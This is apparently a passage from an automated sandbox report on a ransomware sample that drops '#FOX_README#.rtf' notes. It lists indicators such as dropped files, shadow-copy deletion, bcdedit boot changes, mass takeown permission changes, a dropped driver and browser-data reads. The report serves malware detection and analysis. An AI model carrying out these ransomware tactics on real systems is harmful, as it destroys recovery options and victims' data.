f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\MSBuild\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2000 bcdedit.exe 1828 bcdedit.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 11 1500 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS eSOQugH264.exe -
Executes dropped EXE 167 IoCs
pid Process 1764 NW1gKmgI.exe 316 eSOQugH2.exe 1416 eSOQugH264.exe 1000 eSOQugH2.exe 436 eSOQugH2.exe 2012 eSOQugH2.exe 1900 eSOQugH2.exe 800 eSOQugH2.exe 1576 eSOQugH2.exe 1876 eSOQugH2.exe 1340 eSOQugH2.exe 1568 eSOQugH2.exe 1764 eSOQugH2.exe 288 eSOQugH2.exe 1992 eSOQugH2.exe 632 eSOQugH2.exe 656 eSOQugH2.exe 1192 eSOQugH2.exe 536 eSOQugH2.exe 1068 eSOQugH2.exe 1536 eSOQugH2.exe 676 eSOQugH2.exe 1744 eSOQugH2.exe 320 eSOQugH2.exe 744 eSOQugH2.exe 616 eSOQugH2.exe 1428 eSOQugH2.exe 1764 eSOQugH2.exe 1876 eSOQugH2.exe 1000 eSOQugH2.exe 1844 eSOQugH2.exe 1340 eSOQugH2.exe 1436 eSOQugH2.exe 204 eSOQugH2.exe 1912 eSOQugH2.exe 2000 eSOQugH2.exe 1728 eSOQugH2.exe 1764 eSOQugH2.exe 1268 eSOQugH2.exe 936 eSOQugH2.exe 2012 eSOQugH2.exe 1764 eSOQugH2.exe 216 eSOQugH2.exe 936 eSOQugH2.exe 2012 eSOQugH2.exe 1828 eSOQugH2.exe 912 eSOQugH2.exe 1356 eSOQugH2.exe 656 eSOQugH2.exe 936 eSOQugH2.exe 576 eSOQugH2.exe 1728 eSOQugH2.exe 112 eSOQugH2.exe 1568 eSOQugH2.exe 848 eSOQugH2.exe 920 eSOQugH2.exe 1308 eSOQugH2.exe 556 eSOQugH2.exe 1252 eSOQugH2.exe 1568 eSOQugH2.exe 216 eSOQugH2.exe 396 eSOQugH2.exe 940 eSOQugH2.exe 1744 eSOQugH2.exe 1728 eSOQugH2.exe 1300 eSOQugH2.exe 1568 eSOQugH2.exe 1236 eSOQugH2.exe 396 eSOQugH2.exe 2000 eSOQugH2.exe 1744 eSOQugH2.exe 436 eSOQugH2.exe 1300 eSOQugH2.exe 1672 eSOQugH2.exe 1236 eSOQugH2.exe 1900 eSOQugH2.exe 2000 eSOQugH2.exe 228 eSOQugH2.exe 436 eSOQugH2.exe 1496 eSOQugH2.exe 1672 eSOQugH2.exe 204 eSOQugH2.exe 1900 eSOQugH2.exe 1764 eSOQugH2.exe 832 eSOQugH2.exe 936 eSOQugH2.exe 848 eSOQugH2.exe 556 eSOQugH2.exe 224 eSOQugH2.exe 308 eSOQugH2.exe 1764 eSOQugH2.exe 1448 eSOQugH2.exe 936 eSOQugH2.exe 2004 eSOQugH2.exe 556 eSOQugH2.exe 576 eSOQugH2.exe 2024 eSOQugH2.exe 1428 eSOQugH2.exe 1448 eSOQugH2.exe 1952 eSOQugH2.exe 536 eSOQugH2.exe 1684 eSOQugH2.exe 1628 eSOQugH2.exe 1568 eSOQugH2.exe 1428 eSOQugH2.exe 1356 eSOQugH2.exe 1952 eSOQugH2.exe 1828 eSOQugH2.exe 304 eSOQugH2.exe 608 eSOQugH2.exe 1568 eSOQugH2.exe 216 eSOQugH2.exe 1036 eSOQugH2.exe 232 eSOQugH2.exe 1828 eSOQugH2.exe 1788 eSOQugH2.exe 1392 eSOQugH2.exe 936 eSOQugH2.exe 204 eSOQugH2.exe 1672 eSOQugH2.exe 228 eSOQugH2.exe 1900 eSOQugH2.exe 2012 eSOQugH2.exe 212 eSOQugH2.exe 1108 eSOQugH2.exe 1216 eSOQugH2.exe 1796 eSOQugH2.exe 2028 eSOQugH2.exe 1900 eSOQugH2.exe 2024 eSOQugH2.exe 1764 eSOQugH2.exe 1236 eSOQugH2.exe 1492 eSOQugH2.exe 676 eSOQugH2.exe 1744 eSOQugH2.exe 536 eSOQugH2.exe 1268 eSOQugH2.exe 616 eSOQugH2.exe 576 eSOQugH2.exe 1144 eSOQugH2.exe 920 eSOQugH2.exe 1392 eSOQugH2.exe 632 eSOQugH2.exe 1348 eSOQugH2.exe 556 eSOQugH2.exe 2000 eSOQugH2.exe 1864 eSOQugH2.exe 236 eSOQugH2.exe 1436 eSOQugH2.exe 1844 eSOQugH2.exe 1068 eSOQugH2.exe 1308 eSOQugH2.exe 656 eSOQugH2.exe 940 eSOQugH2.exe 1900 eSOQugH2.exe 1500 eSOQugH2.exe 1764 eSOQugH2.exe 396 eSOQugH2.exe 1496 eSOQugH2.exe 744 eSOQugH2.exe 1744 eSOQugH2.exe 564 eSOQugH2.exe 1000 eSOQugH2.exe 1340 eSOQugH2.exe 668 eSOQugH2.exe 236 eSOQugH2.exe 832 eSOQugH2.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000600000001318f-45.dat upx behavioral1/files/0x000600000001318f-46.dat upx behavioral1/files/0x000600000001318f-48.dat upx behavioral1/files/0x000600000001318f-62.dat upx behavioral1/files/0x000600000001318f-64.dat upx behavioral1/files/0x000600000001318f-65.dat upx behavioral1/files/0x000600000001318f-67.dat upx behavioral1/files/0x000600000001318f-72.dat upx behavioral1/files/0x000600000001318f-74.dat upx behavioral1/files/0x000600000001318f-75.dat upx behavioral1/files/0x000600000001318f-77.dat upx behavioral1/files/0x000600000001318f-82.dat upx behavioral1/files/0x000600000001318f-84.dat upx behavioral1/files/0x000600000001318f-85.dat upx behavioral1/files/0x000600000001318f-87.dat upx behavioral1/files/0x000600000001318f-92.dat upx behavioral1/files/0x000600000001318f-94.dat upx behavioral1/files/0x000600000001318f-95.dat upx behavioral1/files/0x000600000001318f-97.dat upx behavioral1/files/0x000600000001318f-102.dat upx behavioral1/files/0x000600000001318f-104.dat upx behavioral1/files/0x000600000001318f-105.dat upx behavioral1/files/0x000600000001318f-107.dat upx behavioral1/files/0x000600000001318f-112.dat upx behavioral1/files/0x000600000001318f-114.dat upx behavioral1/files/0x000600000001318f-115.dat upx behavioral1/files/0x000600000001318f-117.dat upx behavioral1/files/0x000600000001318f-122.dat upx behavioral1/files/0x000600000001318f-124.dat upx behavioral1/files/0x000600000001318f-125.dat upx behavioral1/files/0x000600000001318f-127.dat upx behavioral1/files/0x000600000001318f-132.dat upx behavioral1/files/0x000600000001318f-134.dat upx behavioral1/files/0x000600000001318f-135.dat upx behavioral1/files/0x000600000001318f-137.dat upx behavioral1/files/0x000600000001318f-142.dat upx behavioral1/files/0x000600000001318f-144.dat upx behavioral1/files/0x000600000001318f-145.dat upx behavioral1/files/0x000600000001318f-147.dat upx behavioral1/files/0x000600000001318f-152.dat upx behavioral1/files/0x000600000001318f-154.dat upx behavioral1/files/0x000600000001318f-155.dat upx behavioral1/files/0x000600000001318f-157.dat upx behavioral1/files/0x000600000001318f-162.dat upx behavioral1/files/0x000600000001318f-164.dat upx behavioral1/files/0x000600000001318f-165.dat upx behavioral1/files/0x000600000001318f-167.dat upx behavioral1/files/0x000600000001318f-172.dat upx behavioral1/files/0x000600000001318f-174.dat upx behavioral1/files/0x000600000001318f-176.dat upx behavioral1/files/0x000600000001318f-178.dat upx behavioral1/files/0x000600000001318f-183.dat upx behavioral1/files/0x000600000001318f-185.dat upx behavioral1/files/0x000600000001318f-186.dat upx behavioral1/files/0x000600000001318f-188.dat upx behavioral1/files/0x000600000001318f-193.dat upx behavioral1/files/0x000600000001318f-195.dat upx behavioral1/files/0x000600000001318f-196.dat upx behavioral1/files/0x000600000001318f-198.dat upx behavioral1/files/0x000600000001318f-203.dat upx behavioral1/files/0x000600000001318f-205.dat upx behavioral1/files/0x000600000001318f-206.dat upx behavioral1/files/0x000600000001318f-208.dat upx behavioral1/files/0x000600000001318f-213.dat upx behavioral1/files/0x000600000001318f-215.dat upx behavioral1/files/0x000600000001318f-216.dat upx behavioral1/files/0x000600000001318f-218.dat upx behavioral1/files/0x000600000001318f-223.dat upx behavioral1/files/0x000600000001318f-225.dat upx behavioral1/files/0x000600000001318f-226.dat upx behavioral1/files/0x000600000001318f-228.dat upx behavioral1/files/0x000600000001318f-233.dat upx behavioral1/files/0x000600000001318f-235.dat upx behavioral1/files/0x000600000001318f-236.dat upx behavioral1/files/0x000600000001318f-238.dat upx behavioral1/files/0x000600000001318f-243.dat upx behavioral1/files/0x000600000001318f-245.dat upx behavioral1/files/0x000600000001318f-246.dat upx behavioral1/files/0x000600000001318f-248.dat upx behavioral1/files/0x000600000001318f-256.dat upx behavioral1/files/0x000600000001318f-258.dat upx behavioral1/files/0x000600000001318f-259.dat upx behavioral1/files/0x000600000001318f-261.dat upx behavioral1/files/0x000600000001318f-266.dat upx behavioral1/files/0x000600000001318f-268.dat upx behavioral1/files/0x000600000001318f-269.dat upx behavioral1/files/0x000600000001318f-271.dat upx behavioral1/files/0x000600000001318f-276.dat upx behavioral1/files/0x000600000001318f-278.dat upx behavioral1/files/0x000600000001318f-279.dat upx behavioral1/files/0x000600000001318f-281.dat upx behavioral1/files/0x000600000001318f-286.dat upx behavioral1/files/0x000600000001318f-288.dat upx behavioral1/files/0x000600000001318f-289.dat upx behavioral1/files/0x000600000001318f-291.dat upx behavioral1/files/0x000600000001318f-296.dat upx behavioral1/files/0x000600000001318f-298.dat upx behavioral1/files/0x000600000001318f-299.dat upx behavioral1/files/0x000600000001318f-301.dat upx behavioral1/files/0x000600000001318f-306.dat upx behavioral1/files/0x000600000001318f-308.dat upx behavioral1/files/0x000600000001318f-309.dat upx behavioral1/files/0x000600000001318f-311.dat upx behavioral1/files/0x000600000001318f-316.dat upx behavioral1/files/0x000600000001318f-318.dat upx behavioral1/files/0x000600000001318f-319.dat upx behavioral1/files/0x000600000001318f-321.dat upx behavioral1/files/0x000600000001318f-326.dat upx behavioral1/files/0x000600000001318f-328.dat upx behavioral1/files/0x000600000001318f-329.dat upx behavioral1/files/0x000600000001318f-331.dat upx behavioral1/files/0x000600000001318f-336.dat upx behavioral1/files/0x000600000001318f-338.dat upx behavioral1/files/0x000600000001318f-339.dat upx behavioral1/files/0x000600000001318f-341.dat upx behavioral1/files/0x000600000001318f-346.dat upx behavioral1/files/0x000600000001318f-348.dat upx behavioral1/files/0x000600000001318f-349.dat upx behavioral1/files/0x000600000001318f-351.dat upx behavioral1/files/0x000600000001318f-356.dat upx behavioral1/files/0x000600000001318f-358.dat upx behavioral1/files/0x000600000001318f-359.dat upx behavioral1/files/0x000600000001318f-361.dat upx behavioral1/files/0x000600000001318f-366.dat upx behavioral1/files/0x000600000001318f-368.dat upx behavioral1/files/0x000600000001318f-369.dat upx behavioral1/files/0x000600000001318f-371.dat upx behavioral1/files/0x000600000001318f-376.dat upx behavioral1/files/0x000600000001318f-378.dat upx behavioral1/files/0x000600000001318f-379.dat upx behavioral1/files/0x000600000001318f-381.dat upx behavioral1/files/0x000600000001318f-386.dat upx behavioral1/files/0x000600000001318f-388.dat upx behavioral1/files/0x000600000001318f-389.dat upx behavioral1/files/0x000600000001318f-391.dat upx behavioral1/files/0x000600000001318f-396.dat upx behavioral1/files/0x000600000001318f-398.dat upx behavioral1/files/0x000600000001318f-399.dat upx behavioral1/files/0x000600000001318f-401.dat upx behavioral1/files/0x000600000001318f-406.dat upx behavioral1/files/0x000600000001318f-408.dat upx behavioral1/files/0x000600000001318f-409.dat upx behavioral1/files/0x000600000001318f-411.dat upx behavioral1/files/0x000600000001318f-416.dat upx behavioral1/files/0x000600000001318f-418.dat upx behavioral1/files/0x000600000001318f-419.dat upx behavioral1/files/0x000600000001318f-421.dat upx behavioral1/files/0x000600000001318f-426.dat upx behavioral1/files/0x000600000001318f-428.dat upx behavioral1/files/0x000600000001318f-429.dat upx behavioral1/files/0x000600000001318f-431.dat upx behavioral1/files/0x000600000001318f-436.dat upx behavioral1/files/0x000600000001318f-438.dat upx behavioral1/files/0x000600000001318f-439.dat upx behavioral1/files/0x000600000001318f-441.dat upx behavioral1/files/0x000600000001318f-446.dat upx behavioral1/files/0x000600000001318f-448.dat upx behavioral1/files/0x000600000001318f-449.dat upx behavioral1/files/0x000600000001318f-451.dat upx behavioral1/files/0x000600000001318f-456.dat upx behavioral1/files/0x000600000001318f-458.dat upx behavioral1/files/0x000600000001318f-459.dat upx behavioral1/files/0x000600000001318f-461.dat upx behavioral1/files/0x000600000001318f-466.dat upx behavioral1/files/0x000600000001318f-468.dat upx behavioral1/files/0x000600000001318f-469.dat upx behavioral1/files/0x000600000001318f-471.dat upx behavioral1/files/0x000600000001318f-476.dat upx behavioral1/files/0x000600000001318f-478.dat upx behavioral1/files/0x000600000001318f-479.dat upx behavioral1/files/0x000600000001318f-481.dat upx behavioral1/files/0x000600000001318f-486.dat upx behavioral1/files/0x000600000001318f-488.dat upx behavioral1/files/0x000600000001318f-489.dat upx behavioral1/files/0x000600000001318f-491.dat upx behavioral1/files/0x000600000001318f-496.dat upx behavioral1/files/0x000600000001318f-498.dat upx behavioral1/files/0x000600000001318f-499.dat upx behavioral1/files/0x000600000001318f-501.dat upx behavioral1/files/0x000600000001318f-506.dat upx behavioral1/files/0x000600000001318f-508.dat upx behavioral1/files/0x000600000001318f-509.dat upx behavioral1/files/0x000600000001318f-511.dat upx behavioral1/files/0x000600000001318f-516.dat upx behavioral1/files/0x000600000001318f-518.dat upx behavioral1/files/0x000600000001318f-519.dat upx behavioral1/files/0x000600000001318f-521.dat upx behavioral1/files/0x000600000001318f-526.dat upx behavioral1/files/0x000600000001318f-528.dat upx behavioral1/files/0x000600000001318f-529.dat upx behavioral1/files/0x000600000001318f-531.dat upx behavioral1/files/0x000600000001318f-536.dat upx behavioral1/files/0x000600000001318f-538.dat upx behavioral1/files/0x000600000001318f-539.dat upx behavioral1/files/0x000600000001318f-541.dat upx behavioral1/files/0x000600000001318f-546.dat upx behavioral1/files/0x000600000001318f-548.dat upx behavioral1/files/0x000600000001318f-549.dat upx behavioral1/files/0x000600000001318f-551.dat upx behavioral1/files/0x000600000001318f-556.dat upx behavioral1/files/0x000600000001318f-558.dat upx behavioral1/files/0x000600000001318f-559.dat upx behavioral1/files/0x000600000001318f-561.dat upx behavioral1/files/0x000600000001318f-566.dat upx behavioral1/files/0x000600000001318f-568.dat upx behavioral1/files/0x000600000001318f-569.dat upx behavioral1/files/0x000600000001318f-571.dat upx behavioral1/files/0x000600000001318f-576.dat upx behavioral1/files/0x000600000001318f-578.dat upx behavioral1/files/0x000600000001318f-579.dat upx behavioral1/files/0x000600000001318f-581.dat upx behavioral1/files/0x000600000001318f-586.dat upx behavioral1/files/0x000600000001318f-588.dat upx behavioral1/files/0x000600000001318f-589.dat upx behavioral1/files/0x000600000001318f-591.dat upx behavioral1/files/0x000600000001318f-596.dat upx behavioral1/files/0x000600000001318f-598.dat upx behavioral1/files/0x000600000001318f-599.dat upx behavioral1/files/0x000600000001318f-601.dat upx behavioral1/files/0x000600000001318f-606.dat upx behavioral1/files/0x000600000001318f-608.dat upx behavioral1/files/0x000600000001318f-609.dat upx behavioral1/files/0x000600000001318f-611.dat upx behavioral1/files/0x000600000001318f-616.dat upx behavioral1/files/0x000600000001318f-618.dat upx behavioral1/files/0x000600000001318f-619.dat upx behavioral1/files/0x000600000001318f-621.dat upx behavioral1/files/0x000600000001318f-626.dat upx behavioral1/files/0x000600000001318f-628.dat upx behavioral1/files/0x000600000001318f-629.dat upx behavioral1/files/0x000600000001318f-631.dat upx behavioral1/files/0x000600000001318f-636.dat upx behavioral1/files/0x000600000001318f-638.dat upx behavioral1/files/0x000600000001318f-639.dat upx behavioral1/files/0x000600000001318f-641.dat upx behavioral1/files/0x000600000001318f-646.dat upx behavioral1/files/0x000600000001318f-648.dat upx behavioral1/files/0x000600000001318f-649.dat upx behavioral1/files/0x000600000001318f-651.dat upx behavioral1/files/0x000600000001318f-656.dat upx behavioral1/files/0x000600000001318f-658.dat upx behavioral1/files/0x000600000001318f-659.dat upx behavioral1/files/0x000600000001318f-661.dat upx behavioral1/files/0x000600000001318f-666.dat upx behavioral1/files/0x000600000001318f-668.dat upx behavioral1/files/0x000600000001318f-669.dat upx behavioral1/files/0x000600000001318f-671.dat upx behavioral1/files/0x000600000001318f-676.dat upx behavioral1/files/0x000600000001318f-678.dat upx behavioral1/files/0x000600000001318f-679.dat upx behavioral1/files/0x000600000001318f-681.dat upx behavioral1/files/0x000600000001318f-686.dat upx behavioral1/files/0x000600000001318f-688.dat upx behavioral1/files/0x000600000001318f-689.dat upx behavioral1/files/0x000600000001318f-691.dat upx behavioral1/files/0x000600000001318f-696.dat upx behavioral1/files/0x000600000001318f-698.dat upx behavioral1/files/0x000600000001318f-699.dat upx behavioral1/files/0x000600000001318f-701.dat upx behavioral1/files/0x000600000001318f-706.dat upx behavioral1/files/0x000600000001318f-708.dat upx behavioral1/files/0x000600000001318f-709.dat upx behavioral1/files/0x000600000001318f-711.dat upx behavioral1/files/0x000600000001318f-716.dat upx behavioral1/files/0x000600000001318f-718.dat upx behavioral1/files/0x000600000001318f-719.dat upx behavioral1/files/0x000600000001318f-721.dat upx behavioral1/files/0x000600000001318f-726.dat upx behavioral1/files/0x000600000001318f-728.dat upx behavioral1/files/0x000600000001318f-729.dat upx behavioral1/files/0x000600000001318f-731.dat upx behavioral1/files/0x000600000001318f-736.dat upx behavioral1/files/0x000600000001318f-738.dat upx behavioral1/files/0x000600000001318f-739.dat upx behavioral1/files/0x000600000001318f-741.dat upx behavioral1/files/0x000600000001318f-746.dat upx behavioral1/files/0x000600000001318f-748.dat upx behavioral1/files/0x000600000001318f-749.dat upx behavioral1/files/0x000600000001318f-751.dat upx behavioral1/files/0x000600000001318f-756.dat upx behavioral1/files/0x000600000001318f-758.dat upx behavioral1/files/0x000600000001318f-759.dat upx behavioral1/files/0x000600000001318f-761.dat upx behavioral1/files/0x000600000001318f-766.dat upx behavioral1/files/0x000600000001318f-768.dat upx behavioral1/files/0x000600000001318f-769.dat upx behavioral1/files/0x000600000001318f-771.dat upx behavioral1/files/0x000600000001318f-776.dat upx behavioral1/files/0x000600000001318f-778.dat upx behavioral1/files/0x000600000001318f-779.dat upx behavioral1/files/0x000600000001318f-781.dat upx behavioral1/files/0x000600000001318f-786.dat upx behavioral1/files/0x000600000001318f-788.dat upx behavioral1/files/0x000600000001318f-789.dat upx behavioral1/files/0x000600000001318f-791.dat upx behavioral1/files/0x000600000001318f-796.dat upx behavioral1/files/0x000600000001318f-798.dat upx behavioral1/files/0x000600000001318f-799.dat upx behavioral1/files/0x000600000001318f-801.dat upx behavioral1/files/0x000600000001318f-806.dat upx behavioral1/files/0x000600000001318f-808.dat upx behavioral1/files/0x000600000001318f-809.dat upx behavioral1/files/0x000600000001318f-811.dat upx behavioral1/files/0x000600000001318f-816.dat upx behavioral1/files/0x000600000001318f-818.dat upx behavioral1/files/0x000600000001318f-819.dat upx behavioral1/files/0x000600000001318f-821.dat upx behavioral1/files/0x000600000001318f-826.dat upx behavioral1/files/0x000600000001318f-828.dat upx behavioral1/files/0x000600000001318f-829.dat upx behavioral1/files/0x000600000001318f-831.dat upx behavioral1/files/0x000600000001318f-836.dat upx behavioral1/files/0x000600000001318f-838.dat upx behavioral1/files/0x000600000001318f-839.dat upx behavioral1/files/0x000600000001318f-841.dat upx behavioral1/files/0x000600000001318f-846.dat upx behavioral1/files/0x000600000001318f-848.dat upx behavioral1/files/0x000600000001318f-849.dat upx behavioral1/files/0x000600000001318f-851.dat upx behavioral1/files/0x000600000001318f-856.dat upx behavioral1/files/0x000600000001318f-858.dat upx behavioral1/files/0x000600000001318f-859.dat upx behavioral1/files/0x000600000001318f-861.dat upx behavioral1/files/0x000600000001318f-866.dat upx behavioral1/files/0x000600000001318f-868.dat upx behavioral1/files/0x000600000001318f-869.dat upx behavioral1/files/0x000600000001318f-871.dat upx behavioral1/files/0x000600000001318f-876.dat upx behavioral1/files/0x000600000001318f-878.dat upx behavioral1/files/0x000600000001318f-879.dat upx behavioral1/files/0x000600000001318f-881.dat upx -
Loads dropped DLL 168 IoCs
pid Process 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 300 cmd.exe 316 eSOQugH2.exe 1828 cmd.exe 1192 cmd.exe 1628 cmd.exe 1456 cmd.exe 912 cmd.exe 608 cmd.exe 1844 cmd.exe 1308 cmd.exe 1536 cmd.exe 1628 cmd.exe 1744 cmd.exe 1856 cmd.exe 1492 cmd.exe 668 cmd.exe 1348 cmd.exe 1628 cmd.exe 744 cmd.exe 1576 cmd.exe 608 cmd.exe 656 cmd.exe 1392 cmd.exe 1628 cmd.exe 1224 cmd.exe 1536 cmd.exe 1300 cmd.exe 204 cmd.exe 1884 cmd.exe 1068 cmd.exe 536 cmd.exe 436 cmd.exe 1788 cmd.exe 232 cmd.exe 320 cmd.exe 2024 cmd.exe 228 cmd.exe 1536 cmd.exe 396 cmd.exe 576 cmd.exe 1992 cmd.exe 1448 cmd.exe 940 cmd.exe 220 cmd.exe 1108 cmd.exe 1876 cmd.exe 848 cmd.exe 1364 cmd.exe 1864 cmd.exe 1576 cmd.exe 1628 cmd.exe 220 cmd.exe 564 cmd.exe 1952 cmd.exe 1844 cmd.exe 288 cmd.exe 1348 cmd.exe 1492 cmd.exe 1992 cmd.exe 1788 cmd.exe 1456 cmd.exe 1876 cmd.exe 676 cmd.exe 1308 cmd.exe 1268 cmd.exe 1392 cmd.exe 1216 cmd.exe 216 cmd.exe 320 cmd.exe 1912 cmd.exe 1116 cmd.exe 1892 cmd.exe 992 cmd.exe 656 cmd.exe 1576 cmd.exe 668 cmd.exe 760 cmd.exe 608 cmd.exe 876 cmd.exe 616 cmd.exe 1916 cmd.exe 1536 cmd.exe 1068 cmd.exe 1788 cmd.exe 1192 cmd.exe 2028 cmd.exe 940 cmd.exe 1672 cmd.exe 112 cmd.exe 1016 cmd.exe 1224 cmd.exe 760 cmd.exe 1968 cmd.exe 236 cmd.exe 1844 cmd.exe 1916 cmd.exe 1300 cmd.exe 1116 cmd.exe 1236 cmd.exe 1216 cmd.exe 668 cmd.exe 1576 cmd.exe 1876 cmd.exe 308 cmd.exe 1144 cmd.exe 992 cmd.exe 2000 cmd.exe 2004 cmd.exe 656 cmd.exe 112 cmd.exe 396 cmd.exe 1728 cmd.exe 1000 cmd.exe 940 cmd.exe 1068 cmd.exe 1684 cmd.exe 832 cmd.exe 1192 cmd.exe 1016 cmd.exe 1144 cmd.exe 208 cmd.exe 668 cmd.exe 288 cmd.exe 1496 cmd.exe 1456 cmd.exe 1892 cmd.exe 992 cmd.exe 1436 cmd.exe 1876 cmd.exe 1068 cmd.exe 112 cmd.exe 832 cmd.exe 1968 cmd.exe 320 cmd.exe 1828 cmd.exe 208 cmd.exe 1576 cmd.exe 1448 cmd.exe 204 cmd.exe 1908 cmd.exe 1728 cmd.exe 2028 cmd.exe 1344 cmd.exe 308 cmd.exe 1536 cmd.exe 1952 cmd.exe 232 cmd.exe 676 cmd.exe 2012 cmd.exe 1568 cmd.exe 1672 cmd.exe 556 cmd.exe 1796 cmd.exe 1036 cmd.exe 208 cmd.exe 1436 cmd.exe 1448 cmd.exe 1344 cmd.exe 1908 cmd.exe 656 cmd.exe 1876 cmd.exe 1900 cmd.exe 112 cmd.exe 1764 cmd.exe 1968 cmd.exe 1672 cmd.exe -
Modifies file permissions 1 TTPs 83 IoCs
pid Process 1252 takeown.exe 396 takeown.exe 1428 takeown.exe 744 takeown.exe 744 takeown.exe 436 takeown.exe 436 takeown.exe 204 takeown.exe 1224 takeown.exe 216 takeown.exe 232 takeown.exe 1900 takeown.exe 1356 takeown.exe 1492 takeown.exe 920 takeown.exe 1916 takeown.exe 1300 takeown.exe 1192 takeown.exe 228 takeown.exe 1116 takeown.exe 1216 takeown.exe 1460 takeown.exe 212 takeown.exe 2012 takeown.exe 320 takeown.exe 1684 takeown.exe 1000 takeown.exe 2000 takeown.exe 308 takeown.exe 204 takeown.exe 236 takeown.exe 232 takeown.exe 436 takeown.exe 1900 takeown.exe 1496 takeown.exe 1236 takeown.exe 1900 takeown.exe 2024 takeown.exe 1764 takeown.exe 1496 takeown.exe 1448 takeown.exe 288 takeown.exe 1428 takeown.exe 1788 takeown.exe 1356 takeown.exe 1764 takeown.exe 1428 takeown.exe 832 takeown.exe 848 takeown.exe 212 takeown.exe 576 takeown.exe 1672 takeown.exe 436 takeown.exe 668 takeown.exe 608 takeown.exe 1828 takeown.exe 1496 takeown.exe 1744 takeown.exe 1392 takeown.exe 1348 takeown.exe 2004 takeown.exe 1568 takeown.exe 608 takeown.exe 1568 takeown.exe 676 takeown.exe 1108 takeown.exe 1364 takeown.exe 1536 takeown.exe 1952 takeown.exe 1744 takeown.exe 1684 takeown.exe 832 takeown.exe 1356 takeown.exe 676 takeown.exe 564 takeown.exe 676 takeown.exe 2028 takeown.exe 1036 takeown.exe 1268 takeown.exe 1456 takeown.exe 576 takeown.exe 1672 takeown.exe 940 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 33 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Searches\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Videos\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DUF815Z1\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Downloads\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Libraries\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 